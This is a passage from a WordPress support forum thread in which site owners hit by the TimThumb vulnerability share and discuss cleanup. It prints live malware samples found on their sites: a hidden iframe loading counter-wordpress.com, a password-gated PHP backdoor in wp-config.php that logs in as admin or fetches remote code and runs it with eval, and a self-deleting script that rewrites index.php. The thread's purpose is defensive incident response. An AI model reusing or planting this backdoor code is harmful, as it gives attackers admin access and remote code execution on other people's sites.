Support » Everything else WordPress » [TimThumb Vulnerability] iframe hack

  • Hi,

    have somebody more info about

    <iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
    <html>
    <head>
    </head>
    <body>
    </body>
    </html>
    </iframe>

    Somebody hacked all my WP sites…

    THX to all who will help.

Viewing 15 replies - 16 through 30 (of 59 total)
  • Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Check at http://sitecheck.sucuri.net/scanner/ It should tell you

    Thank you so much!

    Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135'){
    if ($_GET['pingnow']== 'login'){
    $user_login = 'admin';
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).'.php';
    $fp = fopen($fnm, "w");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
    }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}
    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Same advice as before.

    http://wordpress.org/support/topic/iframe-hack-3?replies=18#post-2290168

    You need to rip that code out, ALL of it, change your passwords and clean your site.

    Ipstenu, you are a HUGE help. Thanks so much!

    Hi,

    I hope that I get ride of that s…

    1 step – install fresh wp and template
    2 change all passwords

    check
    wp-config

    and after that I have found next:
    /wp-content/upd.php

    <?php
    $file = __FILE__;
    $pos = strpos($file,'wp-content');
    $dir = substr($file,0,$pos);
    $index = file_get_contents($dir.'index.php');
    $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
    $f = fopen($dir.'index.php',"w");
    fputs($f,$index);
    fclose($f);
    unlink($file);
    ?>

    and
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php

    because of that you need to check wp-content
    Delete those files.

    For now is all OK.

    Good luck guys… 😉

    Look for old jquery.js in your template – delete old or upgrade, looks that sometimes there is also something with this iframe hack.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    1 step – install fresh wp and template

    Instead, DELETE WP and then upload. It’s the only way to scrub out ALL the files. Then you only have to manually check .htaccess and wp-config.php (and if you’ve uploaded any non-images I suppose….)

    Delete it all EXCEPT for:
    wp-config.php
    .htaccess
    /wp-content/uploads

    And even then you have to scan those two files AND look for any .php files in /wp-content/uploads/

    I wish it was easier 🙁

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?

    Because it’s loaded by a JS file… Clever way to hide this kind of thing ….

    My Wp installation is ok now, i didn’t delete and reinstall, but i basically did a byte by byte comparison, of the file (with one of my backup, and the file from 3.2.1).

    But anyway, in my case, the goal was to analyses what they did ….

    The best way to be secure, is obviously to delete and reinstall ….

    (Sorry for my English this morning, still no coffee in the system …)

    I wish it was easier 🙁

    Me too, I have been battling this iframe for the past week. I deleted the entire WP install and reinstalled.

    First I found the iframe in the theme and after the reinstall, it’s in the wp-admin area…not good.

    I’m thinking the injection might be in the DB because how else can it contaminate my installation AND not be purged when I deleted all the files?

    I’m going to have to do a complete reinstallation with a new DB and see how it goes.

    @jorge,

    Was your db changed in wp-config.php? Because ours was and I since have changed the password on it and removed the iframe and been monitoring the site to see if it’s coming back. I’m really hoping the database hasn’t been affected. Let me know what you find.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Yes, just finished another install with a fresh database.

    Went to the wp-admin area, and nothing. I went to the Manage Themes page and bam, it’s there.

    I’m using Chrome – I right click and click on “Inspect Element” – the iframe is there.

    iframe id="iframe" style="width: 1px; height: 1px; " src="http://counter-wordpress.com/frame.php" /iframe

    View source shows nothing but that’s a given. This is driving me bonkers.

    EDIT: If the malicious script was in the DB, it would not have been an issue because like I said, it was a fresh install with a new DB with different passwords, etc.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Jorge – Call your webhost ASAFP and tell them this, because it looks like your server’s compromised.

    Call your webhost

    That’s a big 10-04

    I’ll keep you all posted.

Viewing 15 replies - 16 through 30 (of 59 total)
  • The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies.